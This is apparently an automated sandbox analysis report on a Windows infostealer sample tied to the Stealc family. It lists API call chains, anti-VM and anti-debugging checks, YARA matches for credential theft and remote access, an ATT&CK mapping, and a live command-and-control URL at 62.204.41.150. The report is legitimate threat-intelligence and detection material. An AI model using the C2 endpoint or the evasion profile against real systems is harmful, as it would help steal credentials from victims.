                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_004138B0: wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00414570: GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00414910: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040ED20: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040BE70: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040DE10: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_004016D0: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040DA80: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00413EA0: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040F6B0: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EE697: FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F3B17: wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F4B77: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EEF87: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F47D7: GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EE077: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EDCE7: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EF8F1: FindFirstFileA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EC0D7: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022E1937: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F4107: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022EF917: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00401160: GetSystemInfo,ExitProcess
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.dr; Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware, Inc.
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMwareVMwareB
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008AB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW`
                    Source: Amcache.hve.4.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.dr; Binary or memory string: vmci.sys
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.dr; Binary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.dr; Binary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware20,1
                    Source: Amcache.hve.4.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.dr; Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMwareVMware
                    Source: Amcache.hve.4.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26332)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26375)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26335)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26351)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26346)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-27760)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26220)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API call chain: ExitProcess graph end node (graph_0-26174)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Process queried: DebugPort
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_004045C0: lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0041AD48: memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_004045C0: VirtualProtect ?,00000004,00000100,00000000
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00419860: GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00419750: mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0085A403: push dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022E092B: mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F99B7: mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022E0D90: mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00417850: GetProcessHeap,HeapAlloc,GetUserNameA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0041CEEA: SetUnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0041B33A: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022FAFAF: memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022FD151: SetUnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022FB5A1: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Memory protected: page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match; File source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00419600: CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F9867: CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00417B90: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_022F7DF7: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00416920: GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00417850: GetProcessHeap,HeapAlloc,GetUserNameA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_00417A30: GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA
                    Source: Amcache.hve.4.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.dr; Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.dr; Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.YLshJwBcrT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.YLshJwBcrT.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.YLshJwBcrT.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.22e0e67.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.22e0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                    Remote Access Functionality

Source: Yara match | File source: 0.2.YLshJwBcrT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.YLshJwBcrT.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.YLshJwBcrT.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.22e0e67.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YLshJwBcrT.exe.22e0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a number in parentheses is the count of signatures mapped to that technique; techniques without a count did not match):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (11) | LSASS Memory | Security Software Discovery (41) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (11) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (22) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (133) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
YLshJwBcrT.exe | 38% | Virustotal |
YLshJwBcrT.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
http://62.204.41.150/edd20096ecef326d.php- | 6% | Virustotal |
http://62.204.41.150/ | 9% | Virustotal |
http://62.204.41.150/edd20096ecef326d.php | 15% | Virustotal |
http://62.204.41.150/edd20096ecef326d.phpI | 6% | Virustotal |
http://62.204.41.150 | 9% | Virustotal |
http://62.204.41.150/edd20096ecef326d.phpE | 6% | Virustotal |
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.150/ | true | | unknown
http://62.204.41.150/edd20096ecef326d.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://62.204.41.150/edd20096ecef326d.phpS | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.150/edd20096ecef326d.phpQ | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.1503 | YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.150/edd20096ecef326d.php- | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.150/edd20096ecef326d.phpt | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
http://62.204.41.150 | YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://62.204.41.150/e | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://62.204.41.150/edd20096ecef326d.phpI | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.150/edd20096ecef326d.phpG | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.150/edd20096ecef326d.phpE | YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.204.41.150 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528648
                                Start date and time:2024-10-08 07:20:11 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 4s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:YLshJwBcrT.exe
                                renamed because original name is a hash value
                                Original Sample Name:015ac525cdf1038d8ceb75ba43068da0.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@8/29@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 23
                                • Number of non-executed functions: 166
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 52.165.164.15, 20.42.65.92
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
01:21:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
62.204.41.150 | Qi517dNlNe.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | M13W1o3scc.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | MmcJhaiYNh.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | XQywAEbb9e.exe | malicious | Stealc, Vidar | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | Aew8SXjXEb.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | RJQySowVRb.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | 1f13Cs1ogc.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | 5rVhexjLCx.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
62.204.41.150 | file.exe | malicious | Stealc | 62.204.41.150/edd20096ecef326d.php
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TNNET-ASTNNetOyMainnetworkFI | Qi517dNlNe.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | M13W1o3scc.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | MmcJhaiYNh.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | XQywAEbb9e.exe | malicious | Stealc, Vidar | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | Aew8SXjXEb.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | RJQySowVRb.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | 1f13Cs1ogc.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | 5rVhexjLCx.exe | malicious | Stealc | 62.204.41.150
TNNET-ASTNNetOyMainnetworkFI | file.exe | malicious | Stealc | 62.204.41.150
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8890531002900807
                                Encrypted:false
                                SSDEEP:96:XMhgMrssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUtZrH:2rs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:D5A1CA62919185797C8B941420EBD088
                                SHA1:9A78D37B9BFCE2B6232D18E4B8E7B7582029D7DB
                                SHA-256:42E0A44BF57F44212609B02C46F7E2FB7D3F5F290792894854B44D212A7A04A9
                                SHA-512:67B950ACD737D641421BC13AB6EB2638CC057080D25EF26700E35EBAD4FC43B2473738E9A36B9DAE7A9A8FBAAA191C9A75CB315428CEEA9B1CFC4493EF99B789
                                Malicious:true
                                Reputation:low
